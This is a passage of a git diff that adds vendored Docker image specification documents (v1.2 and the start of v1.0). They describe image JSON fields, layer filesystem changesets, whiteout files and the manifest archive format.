+<pre>"history": [
+  {
+    "created": "2015-10-31T22:22:54.690851953Z",
+    "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"
+  },
+  {
+    "created": "2015-10-31T22:22:55.613815829Z",
+    "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
+    "empty_layer": true
+  }
+]</pre>
+    </dd>
+</dl>
+
+Any extra fields in the Image JSON struct are considered implementation
+specific and should be ignored by any implementations which are unable to
+interpret them.
+
+## Creating an Image Filesystem Changeset
+
+An example of creating an Image Filesystem Changeset follows.
+
+An image root filesystem is first created as an empty directory. Here is the
+initial empty directory structure for the a changeset using the
+randomly-generated directory name `c3167915dc9d` ([actual layer DiffIDs are
+generated based on the content](#id_desc)).
+
+```
+c3167915dc9d/
+```
+
+Files and directories are then created:
+
+```
+c3167915dc9d/
+    etc/
+        my-app-config
+    bin/
+        my-app-binary
+        my-app-tools
+```
+
+The `c3167915dc9d` directory is then committed as a plain Tar archive with
+entries for the following files:
+
+```
+etc/my-app-config
+bin/my-app-binary
+bin/my-app-tools
+```
+
+To make changes to the filesystem of this container image, create a new
+directory, such as `f60c56784b83`, and initialize it with a snapshot of the
+parent image's root filesystem, so that the directory is identical to that
+of `c3167915dc9d`. NOTE: a copy-on-write or union filesystem can make this very
+efficient:
+
+```
+f60c56784b83/
+    etc/
+        my-app-config
+    bin/
+        my-app-binary
+        my-app-tools
+```
+
+This example change is going add a configuration directory at `/etc/my-app.d`
+which contains a default config file. There's also a change to the
+`my-app-tools` binary to handle the config layout change. The `f60c56784b83`
+directory then looks like this:
+
+```
+f60c56784b83/
+    etc/
+        my-app.d/
+            default.cfg
+    bin/
+        my-app-binary
+        my-app-tools
+```
+
+This reflects the removal of `/etc/my-app-config` and creation of a file and
+directory at `/etc/my-app.d/default.cfg`. `/bin/my-app-tools` has also been
+replaced with an updated version. Before committing this directory to a
+changeset, because it has a parent image, it is first compared with the
+directory tree of the parent snapshot, `f60c56784b83`, looking for files and
+directories that have been added, modified, or removed. The following changeset
+is found:
+
+```
+Added:      /etc/my-app.d/default.cfg
+Modified:   /bin/my-app-tools
+Deleted:    /etc/my-app-config
+```
+
+A Tar Archive is then created which contains *only* this changeset: The added
+and modified files and directories in their entirety, and for each deleted item
+an entry for an empty file at the same location but with the basename of the
+deleted file or directory prefixed with `.wh.`. The filenames prefixed with
+`.wh.` are known as "whiteout" files. NOTE: For this reason, it is not possible
+to create an image root filesystem which contains a file or directory with a
+name beginning with `.wh.`. The resulting Tar archive for `f60c56784b83` has
+the following entries:
+
+```
+/etc/my-app.d/default.cfg
+/bin/my-app-tools
+/etc/.wh.my-app-config
+```
+
+Any given image is likely to be composed of several of these Image Filesystem
+Changeset tar archives.
+
+## Combined Image JSON + Filesystem Changeset Format
+
+There is also a format for a single archive which contains complete information
+about an image, including:
+
+ - repository names/tags
+ - image configuration JSON file
+ - all tar archives of each layer filesystem changesets
+
+For example, here's what the full archive of `library/busybox` is (displayed in
+`tree` format):
+
+```
+.
+├── 47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json
+├── 5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
+├── a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
+├── manifest.json
+└── repositories
+```
+
+There is a directory for each layer in the image. Each directory is named with
+a 64 character hex name that is deterministically generated from the layer
+information. These names are not necessarily layer DiffIDs or ChainIDs. Each of
+these directories contains 3 files:
+
+ * `VERSION` - The schema version of the `json` file
+ * `json` - The legacy JSON metadata for an image layer. In this version of
+    the image specification, layers don't have JSON metadata, but in
+    [version 1](v1.md), they did. A file is created for each layer in the
+    v1 format for backward compatibility.
+ * `layer.tar` - The Tar archive of the filesystem changeset for an image
+   layer.
+
+Note that this directory layout is only important for backward compatibility.
+Current implementations use the paths specified in `manifest.json`.
+
+The content of the `VERSION` files is simply the semantic version of the JSON
+metadata schema:
+
+```
+1.0
+```
+
+The `repositories` file is another JSON file which describes names/tags:
+
+```
+{  
+    "busybox":{  
+        "latest":"5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a"
+    }
+}
+```
+
+Every key in this object is the name of a repository, and maps to a collection
+of tag suffixes. Each tag maps to the ID of the image represented by that tag.
+This file is only used for backwards compatibility. Current implementations use
+the `manifest.json` file instead.
+
+The `manifest.json` file provides the image JSON for the top-level image, and
+optionally for parent images that this image was derived from. It consists of
+an array of metadata entries:
+
+```
+[
+  {
+    "Config": "47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json",
+    "RepoTags": ["busybox:latest"],
+    "Layers": [
+      "a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198/layer.tar",
+      "5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a/layer.tar"
+    ]
+  }
+]
+```
+
+There is an entry in the array for each image.
+
+The `Config` field references another file in the tar which includes the image
+JSON for this image.
+
+The `RepoTags` field lists references pointing to this image.
+
+The `Layers` field points to the filesystem changeset tars.
+
+An optional `Parent` field references the imageID of the parent image. This
+parent must be part of the same `manifest.json` file.
+
+This file shouldn't be confused with the distribution manifest, used to push
+and pull images.
+
+Generally, implementations that support this version of the spec will use
+the `manifest.json` file if available, and older implementations will use the
+legacy `*/json` files and `repositories`.
diff --git a/vendor/github.com/docker/docker/image/spec/v1.2.md b/vendor/github.com/docker/docker/image/spec/v1.2.md
new file mode 100644
index 0000000000..6c641cafec
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/spec/v1.2.md
@@ -0,0 +1,696 @@
+# Docker Image Specification v1.2.0
+
+An *Image* is an ordered collection of root filesystem changes and the
+corresponding execution parameters for use within a container runtime. This
+specification outlines the format of these filesystem changes and corresponding
+parameters and describes how to create and use them for use with a container
+runtime and execution tool.
+
+This version of the image specification was adopted starting in Docker 1.12.
+
+## Terminology
+
+This specification uses the following terms:
+
+<dl>
+    <dt>
+        Layer
+    </dt>
+    <dd>
+        Images are composed of <i>layers</i>. Each layer is a set of filesystem
+        changes. Layers do not have configuration metadata such as environment
+        variables or default arguments - these are properties of the image as a
+        whole rather than any particular layer.
+    </dd>
+    <dt>
+        Image JSON
+    </dt>
+    <dd>
+        Each image has an associated JSON structure which describes some
+        basic information about the image such as date created, author, and the
+        ID of its parent image as well as execution/runtime configuration like
+        its entry point, default arguments, CPU/memory shares, networking, and
+        volumes. The JSON structure also references a cryptographic hash of
+        each layer used by the image, and provides history information for
+        those layers. This JSON is considered to be immutable, because changing
+        it would change the computed ImageID. Changing it means creating a new
+        derived image, instead of changing the existing image.
+    </dd>
+    <dt>
+        Image Filesystem Changeset
+    </dt>
+    <dd>
+        Each layer has an archive of the files which have been added, changed,
+        or deleted relative to its parent layer. Using a layer-based or union
+        filesystem such as AUFS, or by computing the diff from filesystem
+        snapshots, the filesystem changeset can be used to present a series of
+        image layers as if they were one cohesive filesystem.
+    </dd>
+    <dt>
+        Layer DiffID
+    </dt>
+    <dd>
+        Layers are referenced by cryptographic hashes of their serialized
+        representation. This is a SHA256 digest over the tar archive used to
+        transport the layer, represented as a hexadecimal encoding of 256 bits, e.g.,
+        <code>sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9</code>.
+        Layers must be packed and unpacked reproducibly to avoid changing the
+        layer ID, for example by using tar-split to save the tar headers. Note
+        that the digest used as the layer ID is taken over an uncompressed
+        version of the tar.
+    </dd>
+    <dt>
+        Layer ChainID
+    </dt>
+    <dd>
+        For convenience, it is sometimes useful to refer to a stack of layers
+        with a single identifier. This is called a <code>ChainID</code>. For a
+        single layer (or the layer at the bottom of a stack), the
+        <code>ChainID</code> is equal to the layer's <code>DiffID</code>.
+        Otherwise the <code>ChainID</code> is given by the formula:
+        <code>ChainID(layerN) = SHA256hex(ChainID(layerN-1) + " " + DiffID(layerN))</code>.
+    </dd>
+    <dt>
+        ImageID <a name="id_desc"></a>
+    </dt>
+    <dd>
+        Each image's ID is given by the SHA256 hash of its configuration JSON. It is 
+        represented as a hexadecimal encoding of 256 bits, e.g.,
+        <code>sha256:a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9</code>.
+        Since the configuration JSON that gets hashed references hashes of each
+        layer in the image, this formulation of the ImageID makes images
+        content-addressable.
+    </dd>
+    <dt>
+        Tag
+    </dt>
+    <dd>
+        A tag serves to map a descriptive, user-given name to any single image
+        ID. Tag values are limited to the set of characters
+        <code>[a-zA-Z0-9_.-]</code>, except they may not start with a <code>.</code>
+        or <code>-</code> character. Tags are limited to 127 characters.
+    </dd>
+    <dt>
+        Repository
+    </dt>
+    <dd>
+        A collection of tags grouped under a common prefix (the name component
+        before <code>:</code>). For example, in an image tagged with the name
+        <code>my-app:3.1.4</code>, <code>my-app</code> is the <i>Repository</i>
+        component of the name. A repository name is made up of slash-separated
+        name components, optionally prefixed by a DNS hostname. The hostname
+        must follow comply with standard DNS rules, but may not contain
+        <code>_</code> characters. If a hostname is present, it may optionally
+        be followed by a port number in the format <code>:8080</code>.
+        Name components may contain lowercase characters, digits, and
+        separators. A separator is defined as a period, one or two underscores,
+        or one or more dashes. A name component may not start or end with
+        a separator.
+    </dd>
+</dl>
+
+## Image JSON Description
+
+Here is an example image JSON file:
+
+```
+{  
+    "created": "2015-10-31T22:22:56.015925234Z",
+    "author": "Alyssa P. Hacker &ltalyspdev@example.com&gt",
+    "architecture": "amd64",
+    "os": "linux",
+    "config": {
+        "User": "alice",
+        "Memory": 2048,
+        "MemorySwap": 4096,
+        "CpuShares": 8,
+        "ExposedPorts": {  
+            "8080/tcp": {}
+        },
+        "Env": [  
+            "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
+            "FOO=docker_is_a_really",
+            "BAR=great_tool_you_know"
+        ],
+        "Entrypoint": [
+            "/bin/my-app-binary"
+        ],
+        "Cmd": [
+            "--foreground",
+            "--config",
+            "/etc/my-app.d/default.cfg"
+        ],
+        "Volumes": {
+            "/var/job-result-data": {},
+            "/var/log/my-app-logs": {},
+        },
+        "WorkingDir": "/home/alice",
+    },
+    "rootfs": {
+      "diff_ids": [
+        "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
+        "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef"
+      ],
+      "type": "layers"
+    },
+    "history": [
+      {
+        "created": "2015-10-31T22:22:54.690851953Z",
+        "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"
+      },
+      {
+        "created": "2015-10-31T22:22:55.613815829Z",
+        "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
+        "empty_layer": true
+      }
+    ]
+}
+```
+
+Note that image JSON files produced by Docker don't contain formatting
+whitespace. It has been added to this example for clarity.
+
+### Image JSON Field Descriptions
+
+<dl>
+    <dt>
+        created <code>string</code>
+    </dt>
+    <dd>
+        ISO-8601 formatted combined date and time at which the image was
+        created.
+    </dd>
+    <dt>
+        author <code>string</code>
+    </dt>
+    <dd>
+        Gives the name and/or email address of the person or entity which
+        created and is responsible for maintaining the image.
+    </dd>
+    <dt>
+        architecture <code>string</code>
+    </dt>
+    <dd>
+        The CPU architecture which the binaries in this image are built to run
+        on. Possible values include:
+        <ul>
+            <li>386</li>
+            <li>amd64</li>
+            <li>arm</li>
+        </ul>
+        More values may be supported in the future and any of these may or may
+        not be supported by a given container runtime implementation.
+    </dd>
+    <dt>
+        os <code>string</code>
+    </dt>
+    <dd>
+        The name of the operating system which the image is built to run on.
+        Possible values include:
+        <ul>
+            <li>darwin</li>
+            <li>freebsd</li>
+            <li>linux</li>
+        </ul>
+        More values may be supported in the future and any of these may or may
+        not be supported by a given container runtime implementation.
+    </dd>
+    <dt>
+        config <code>struct</code>
+    </dt>
+    <dd>
+        The execution parameters which should be used as a base when running a
+        container using the image. This field can be <code>null</code>, in
+        which case any execution parameters should be specified at creation of
+        the container.
+
+        <h4>Container RunConfig Field Descriptions</h4>
+
+        <dl>
+            <dt>
+                User <code>string</code>
+            </dt>
+            <dd>
+                <p>The username or UID which the process in the container should
+                run as. This acts as a default value to use when the value is
+                not specified when creating a container.</p>
+
+                <p>All of the following are valid:</p>
+
+                <ul>
+                    <li><code>user</code></li>
+                    <li><code>uid</code></li>
+                    <li><code>user:group</code></li>
+                    <li><code>uid:gid</code></li>
+                    <li><code>uid:group</code></li>
+                    <li><code>user:gid</code></li>
+                </ul>
+
+                <p>If <code>group</code>/<code>gid</code> is not specified, the
+                default group and supplementary groups of the given
+                <code>user</code>/<code>uid</code> in <code>/etc/passwd</code>
+                from the container are applied.</p>
+            </dd>
+            <dt>
+                Memory <code>integer</code>
+            </dt>
+            <dd>
+                Memory limit (in bytes). This acts as a default value to use
+                when the value is not specified when creating a container.
+            </dd>
+            <dt>
+                MemorySwap <code>integer</code>
+            </dt>
+            <dd>
+                Total memory usage (memory + swap); set to <code>-1</code> to
+                disable swap. This acts as a default value to use when the
+                value is not specified when creating a container.
+            </dd>
+            <dt>
+                CpuShares <code>integer</code>
+            </dt>
+            <dd>
+                CPU shares (relative weight vs. other containers). This acts as
+                a default value to use when the value is not specified when
+                creating a container.
+            </dd>
+            <dt>
+                ExposedPorts <code>struct</code>
+            </dt>
+            <dd>
+                A set of ports to expose from a container running this image.
+                This JSON structure value is unusual because it is a direct
+                JSON serialization of the Go type
+                <code>map[string]struct{}</code> and is represented in JSON as
+                an object mapping its keys to an empty object. Here is an
+                example:
+
+<pre>{
+    "8080": {},
+    "53/udp": {},
+    "2356/tcp": {}
+}</pre>
+
+                Its keys can be in the format of:
+                <ul>
+                    <li>
+                        <code>"port/tcp"</code>
+                    </li>
+                    <li>
+                        <code>"port/udp"</code>
+                    </li>
+                    <li>
+                        <code>"port"</code>
+                    </li>
+                </ul>
+                with the default protocol being <code>"tcp"</code> if not
+                specified.
+
+                These values act as defaults and are merged with any specified
+                when creating a container.
+            </dd>
+            <dt>
+                Env <code>array of strings</code>
+            </dt>
+            <dd>
+                Entries are in the format of <code>VARNAME="var value"</code>.
+                These values act as defaults and are merged with any specified
+                when creating a container.
+            </dd>
+            <dt>
+                Entrypoint <code>array of strings</code>
+            </dt>
+            <dd>
+                A list of arguments to use as the command to execute when the
+                container starts. This value acts as a  default and is replaced
+                by an entrypoint specified when creating a container.
+            </dd>
+            <dt>
+                Cmd <code>array of strings</code>
+            </dt>
+            <dd>
+                Default arguments to the entry point of the container. These
+                values act as defaults and are replaced with any specified when
+                creating a container. If an <code>Entrypoint</code> value is
+                not specified, then the first entry of the <code>Cmd</code>
+                array should be interpreted as the executable to run.
+            </dd>
+            <dt>
+                Healthcheck <code>struct</code>
+            </dt>
+            <dd>
+                A test to perform to determine whether the container is healthy.
+                Here is an example:
+<pre>{
+  "Test": [
+      "CMD-SHELL",
+      "/usr/bin/check-health localhost"
+  ],
+  "Interval": 30000000000,
+  "Timeout": 10000000000,
+  "Retries": 3
+}</pre>
+                The object has the following fields.
+                <dl>
+                    <dt>
+                        Test <code>array of strings</code>
+                    </dt>
+                    <dd>
+                        The test to perform to check that the container is healthy.
+                        The options are:
+                        <ul>
+                            <li><code>[]</code> : inherit healthcheck from base image</li>
+                            <li><code>["NONE"]</code> : disable healthcheck</li>
+                            <li><code>["CMD", arg1, arg2, ...]</code> : exec arguments directly</li>
+                            <li><code>["CMD-SHELL", command]</code> : run command with system's default shell</li>
+                        </ul>
+
+                        The test command should exit with a status of 0 if the container is healthy,
+                        or with 1 if it is unhealthy.
+                    </dd>
+                    <dt>
+                        Interval <code>integer</code>
+                    </dt>
+                    <dd>
+                        Number of nanoseconds to wait between probe attempts.
+                    </dd>
+                    <dt>
+                        Timeout <code>integer</code>
+                    </dt>
+                    <dd>
+                        Number of nanoseconds to wait before considering the check to have hung.
+                    </dd>
+                    <dt>
+                        Retries <code>integer</code>
+                    <dt>
+                    <dd>
+                        The number of consecutive failures needed to consider a container as unhealthy.
+                    </dd>
+                </dl>
+
+                In each case, the field can be omitted to indicate that the
+                value should be inherited from the base layer.
+
+                These values act as defaults and are merged with any specified
+                when creating a container.
+            </dd>
+            <dt>
+                Volumes <code>struct</code>
+            </dt>
+            <dd>
+                A set of directories which should be created as data volumes in
+                a container running this image. This JSON structure value is
+                unusual because it is a direct JSON serialization of the Go
+                type <code>map[string]struct{}</code> and is represented in
+                JSON as an object mapping its keys to an empty object. Here is
+                an example:
+<pre>{
+    "/var/my-app-data/": {},
+    "/etc/some-config.d/": {},
+}</pre>
+            </dd>
+            <dt>
+                WorkingDir <code>string</code>
+            </dt>
+            <dd>
+                Sets the current working directory of the entry point process
+                in the container. This value acts as a default and is replaced
+                by a working directory specified when creating a container.
+            </dd>
+        </dl>
+    </dd>
+    <dt>
+        rootfs <code>struct</code>
+    </dt>
+    <dd>
+        The rootfs key references the layer content addresses used by the
+        image. This makes the image config hash depend on the filesystem hash.
+        rootfs has two subkeys:
+
+        <ul>
+          <li>
+            <code>type</code> is usually set to <code>layers</code>.
+          </li>
+          <li>
+            <code>diff_ids</code> is an array of layer content hashes (<code>DiffIDs</code>), in order from bottom-most to top-most.
+          </li>
+        </ul>
+
+
+        Here is an example rootfs section:
+
+<pre>"rootfs": {
+  "diff_ids": [
+    "sha256:c6f988f4874bb0add23a778f753c65efe992244e148a1d2ec2a8b664fb66bbd1",
+    "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef",
+    "sha256:13f53e08df5a220ab6d13c58b2bf83a59cbdc2e04d0a3f041ddf4b0ba4112d49"
+  ],
+  "type": "layers"
+}</pre>
+    </dd>
+    <dt>
+        history <code>struct</code>
+    </dt>
+    <dd>
+        <code>history</code> is an array of objects describing the history of
+        each layer. The array is ordered from bottom-most layer to top-most
+        layer. The object has the following fields.
+
+        <ul>
+          <li>
+            <code>created</code>: Creation time, expressed as a ISO-8601 formatted
+            combined date and time
+          </li>
+          <li>
+            <code>author</code>: The author of the build point
+          </li>
+          <li>
+            <code>created_by</code>: The command which created the layer
+          </li>
+          <li>
+            <code>comment</code>: A custom message set when creating the layer
+          </li>
+          <li>
+            <code>empty_layer</code>: This field is used to mark if the history
+            item created a filesystem diff. It is set to true if this history
+            item doesn't correspond to an actual layer in the rootfs section
+            (for example, a command like ENV which results in no change to the
+            filesystem).
+          </li>
+        </ul>
+
+Here is an example history section:
+
+<pre>"history": [
+  {
+    "created": "2015-10-31T22:22:54.690851953Z",
+    "created_by": "/bin/sh -c #(nop) ADD file:a3bc1e842b69636f9df5256c49c5374fb4eef1e281fe3f282c65fb853ee171c5 in /"
+  },
+  {
+    "created": "2015-10-31T22:22:55.613815829Z",
+    "created_by": "/bin/sh -c #(nop) CMD [\"sh\"]",
+    "empty_layer": true
+  }
+]</pre>
+    </dd>
+</dl>
+
+Any extra fields in the Image JSON struct are considered implementation
+specific and should be ignored by any implementations which are unable to
+interpret them.
+
+## Creating an Image Filesystem Changeset
+
+An example of creating an Image Filesystem Changeset follows.
+
+An image root filesystem is first created as an empty directory. Here is the
+initial empty directory structure for the a changeset using the
+randomly-generated directory name `c3167915dc9d` ([actual layer DiffIDs are
+generated based on the content](#id_desc)).
+
+```
+c3167915dc9d/
+```
+
+Files and directories are then created:
+
+```
+c3167915dc9d/
+    etc/
+        my-app-config
+    bin/
+        my-app-binary
+        my-app-tools
+```
+
+The `c3167915dc9d` directory is then committed as a plain Tar archive with
+entries for the following files:
+
+```
+etc/my-app-config
+bin/my-app-binary
+bin/my-app-tools
+```
+
+To make changes to the filesystem of this container image, create a new
+directory, such as `f60c56784b83`, and initialize it with a snapshot of the
+parent image's root filesystem, so that the directory is identical to that
+of `c3167915dc9d`. NOTE: a copy-on-write or union filesystem can make this very
+efficient:
+
+```
+f60c56784b83/
+    etc/
+        my-app-config
+    bin/
+        my-app-binary
+        my-app-tools
+```
+
+This example change is going add a configuration directory at `/etc/my-app.d`
+which contains a default config file. There's also a change to the
+`my-app-tools` binary to handle the config layout change. The `f60c56784b83`
+directory then looks like this:
+
+```
+f60c56784b83/
+    etc/
+        my-app.d/
+            default.cfg
+    bin/
+        my-app-binary
+        my-app-tools
+```
+
+This reflects the removal of `/etc/my-app-config` and creation of a file and
+directory at `/etc/my-app.d/default.cfg`. `/bin/my-app-tools` has also been
+replaced with an updated version. Before committing this directory to a
+changeset, because it has a parent image, it is first compared with the
+directory tree of the parent snapshot, `f60c56784b83`, looking for files and
+directories that have been added, modified, or removed. The following changeset
+is found:
+
+```
+Added:      /etc/my-app.d/default.cfg
+Modified:   /bin/my-app-tools
+Deleted:    /etc/my-app-config
+```
+
+A Tar Archive is then created which contains *only* this changeset: The added
+and modified files and directories in their entirety, and for each deleted item
+an entry for an empty file at the same location but with the basename of the
+deleted file or directory prefixed with `.wh.`. The filenames prefixed with
+`.wh.` are known as "whiteout" files. NOTE: For this reason, it is not possible
+to create an image root filesystem which contains a file or directory with a
+name beginning with `.wh.`. The resulting Tar archive for `f60c56784b83` has
+the following entries:
+
+```
+/etc/my-app.d/default.cfg
+/bin/my-app-tools
+/etc/.wh.my-app-config
+```
+
+Any given image is likely to be composed of several of these Image Filesystem
+Changeset tar archives.
+
+## Combined Image JSON + Filesystem Changeset Format
+
+There is also a format for a single archive which contains complete information
+about an image, including:
+
+ - repository names/tags
+ - image configuration JSON file
+ - all tar archives of each layer filesystem changesets
+
+For example, here's what the full archive of `library/busybox` is (displayed in
+`tree` format):
+
+```
+.
+├── 47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json
+├── 5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
+├── a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198
+│   ├── VERSION
+│   ├── json
+│   └── layer.tar
+├── manifest.json
+└── repositories
+```
+
+There is a directory for each layer in the image. Each directory is named with
+a 64 character hex name that is deterministically generated from the layer
+information. These names are not necessarily layer DiffIDs or ChainIDs. Each of
+these directories contains 3 files:
+
+ * `VERSION` - The schema version of the `json` file
+ * `json` - The legacy JSON metadata for an image layer. In this version of
+    the image specification, layers don't have JSON metadata, but in
+    [version 1](v1.md), they did. A file is created for each layer in the
+    v1 format for backward compatibility.
+ * `layer.tar` - The Tar archive of the filesystem changeset for an image
+   layer.
+
+Note that this directory layout is only important for backward compatibility.
+Current implementations use the paths specified in `manifest.json`.
+
+The content of the `VERSION` files is simply the semantic version of the JSON
+metadata schema:
+
+```
+1.0
+```
+
+The `repositories` file is another JSON file which describes names/tags:
+
+```
+{  
+    "busybox":{  
+        "latest":"5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a"
+    }
+}
+```
+
+Every key in this object is the name of a repository, and maps to a collection
+of tag suffixes. Each tag maps to the ID of the image represented by that tag.
+This file is only used for backwards compatibility. Current implementations use
+the `manifest.json` file instead.
+
+The `manifest.json` file provides the image JSON for the top-level image, and
+optionally for parent images that this image was derived from. It consists of
+an array of metadata entries:
+
+```
+[
+  {
+    "Config": "47bcc53f74dc94b1920f0b34f6036096526296767650f223433fe65c35f149eb.json",
+    "RepoTags": ["busybox:latest"],
+    "Layers": [
+      "a65da33792c5187473faa80fa3e1b975acba06712852d1dea860692ccddf3198/layer.tar",
+      "5f29f704785248ddb9d06b90a11b5ea36c534865e9035e4022bb2e71d4ecbb9a/layer.tar"
+    ]
+  }
+]
+```
+
+There is an entry in the array for each image.
+
+The `Config` field references another file in the tar which includes the image
+JSON for this image.
+
+The `RepoTags` field lists references pointing to this image.
+
+The `Layers` field points to the filesystem changeset tars.
+
+An optional `Parent` field references the imageID of the parent image. This
+parent must be part of the same `manifest.json` file.
+
+This file shouldn't be confused with the distribution manifest, used to push
+and pull images.
+
+Generally, implementations that support this version of the spec will use
+the `manifest.json` file if available, and older implementations will use the
+legacy `*/json` files and `repositories`.
diff --git a/vendor/github.com/docker/docker/image/spec/v1.md b/vendor/github.com/docker/docker/image/spec/v1.md
new file mode 100644
index 0000000000..57a599b8ff
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/spec/v1.md
@@ -0,0 +1,573 @@
+# Docker Image Specification v1.0.0
+
+An *Image* is an ordered collection of root filesystem changes and the
+corresponding execution parameters for use within a container runtime. This
+specification outlines the format of these filesystem changes and corresponding
+parameters and describes how to create and use them for use with a container
+runtime and execution tool.
+
+## Terminology
+
+This specification uses the following terms:
+
+<dl>
+    <dt>
+        Layer
+    </dt>
+    <dd>
+        Images are composed of <i>layers</i>. <i>Image layer</i> is a general
+        term which may be used to refer to one or both of the following:
+
+        <ol>
+            <li>The metadata for the layer, described in the JSON format.</li>
+            <li>The filesystem changes described by a layer.</li>
+        </ol>
+
+        To refer to the former you may use the term <i>Layer JSON</i> or
+        <i>Layer Metadata</i>. To refer to the latter you may use the term
+        <i>Image Filesystem Changeset</i> or <i>Image Diff</i>.
+    </dd>
+    <dt>
+        Image JSON
+    </dt>
+    <dd>
+        Each layer has an associated JSON structure which describes some
+        basic information about the image such as date created, author, and the
+        ID of its parent image as well as execution/runtime configuration like
+        its entry point, default arguments, CPU/memory shares, networking, and
+        volumes.
+    </dd>
+    <dt>
+        Image Filesystem Changeset
+    </dt>
+    <dd>
+        Each layer has an archive of the files which have been added, changed,
+        or deleted relative to its parent layer. Using a layer-based or union
+        filesystem such as AUFS, or by computing the diff from filesystem
+        snapshots, the filesystem changeset can be used to present a series of
+        image layers as if they were one cohesive filesystem.
+    </dd>
+    <dt>
+        Image ID <a name="id_desc"></a>
+    </dt>
+    <dd>
+        Each layer is given an ID upon its creation. It is 
+        represented as a hexadecimal encoding of 256 bits, e.g.,
+        <code>a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9</code>.
+        Image IDs should be sufficiently random so as to be globally unique.
+        32 bytes read from <code>/dev/urandom</code> is sufficient for all
+        practical purposes. Alternatively, an image ID may be derived as a
+        cryptographic hash of image contents as the result is considered
+        indistinguishable from random. The choice is left up to implementors.
+    </dd>
+    <dt>
+        Image Parent
+    </dt>
+    <dd>
+        Most layer metadata structs contain a <code>parent</code> field which
+        refers to the Image from which another directly descends. An image
+        contains a separate JSON metadata file and set of changes relative to
+        the filesystem of its parent image. <i>Image Ancestor</i> and
+        <i>Image Descendant</i> are also common terms.
+    </dd>
+    <dt>
+        Image Checksum
+    </dt>
+    <dd>
+        Layer metadata structs contain a cryptographic hash of the contents of
+        the layer's filesystem changeset. Though the set of changes exists as a
+        simple Tar archive, two archives with identical filenames and content
+        will have different SHA digests if the last-access or last-modified
+        times of any entries differ. For this reason, image checksums are
+        generated using the TarSum algorithm which produces a cryptographic
+        hash of file contents and selected headers only. Details of this
+        algorithm are described in the separate <a href="https://github.com/docker/docker/blob/master/pkg/tarsum/tarsum_spec.md">TarSum specification</a>.
+    </dd>
+    <dt>
+        Tag
+    </dt>
+    <dd>
+        A tag serves to map a descriptive, user-given name to any single image
+        ID. An image name suffix (the name component after <code>:</code>) is
+        often referred to as a tag as well, though it strictly refers to the
+        full name of an image. Acceptable values for a tag suffix are
+        implementation specific, but they SHOULD be limited to the set of
+        alphanumeric characters <code>[a-zA-z0-9]</code>, punctuation
+        characters <code>[._-]</code>, and MUST NOT contain a <code>:</code>
+        character.
+    </dd>
+    <dt>
+        Repository
+    </dt>
+    <dd>
+        A collection of tags grouped under a common prefix (the name component
+        before <code>:</code>). For example, in an image tagged with the name
+        <code>my-app:3.1.4</code>, <code>my-app</code> is the <i>Repository</i>
+        component of the name. Acceptable values for repository name are
+        implementation specific, but they SHOULD be limited to the set of
+        alphanumeric characters <code>[a-zA-z0-9]</code>, and punctuation
+        characters <code>[._-]</code>, however it MAY contain additional
+        <code>/</code> and <code>:</code> characters for organizational
+        purposes, with the last <code>:</code> character being interpreted
+        dividing the repository component of the name from the tag suffix
+        component.
+    </dd>
+</dl>
+
+## Image JSON Description
+
+Here is an example image JSON file:
+
+```
+{  
+    "id": "a9561eb1b190625c9adb5a9513e72c4dedafc1cb2d4c5236c9a6957ec7dfd5a9",
+    "parent": "c6e3cedcda2e3982a1a6760e178355e8e65f7b80e4e5248743fa3549d284e024",
+    "checksum": "tarsum.v1+sha256:e58fcf7418d2390dec8e8fb69d88c06ec07039d651fedc3aa72af9972e7d046b",
+    "created": "2014-10-13T21:19:18.674353812Z",
+    "author": "Alyssa P. Hacker &ltalyspdev@example.com&gt",
+    "architecture": "amd64",
+    "os": "linux",
+    "Size": 271828,
+    "config": {
+        "User": "alice",
+        "Memory": 2048,
+        "MemorySwap": 4096,
+        "CpuShares": 8,
+        "ExposedPorts": {  
+            "8080/tcp": {}
+        },
+        "Env": [  
+            "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
+            "FOO=docker_is_a_really",
+            "BAR=great_tool_you_know"
+        ],
+        "Entrypoint": [
+            "/bin/my-app-binary"
+        ],
+        "Cmd": [
+            "--foreground",
+            "--config",
+            "/etc/my-app.d/default.cfg"
+        ],
+        "Volumes": {
+            "/var/job-result-data": {},
+            "/var/log/my-app-logs": {},
+        },
+        "WorkingDir": "/home/alice",
+    }
+}
+```
+
+### Image JSON Field Descriptions
+
+<dl>
+    <dt>
+        id <code>string</code>
+    </dt>
+    <dd>
+        Randomly generated, 256-bit, hexadecimal encoded. Uniquely identifies
+        the image.
+    </dd>
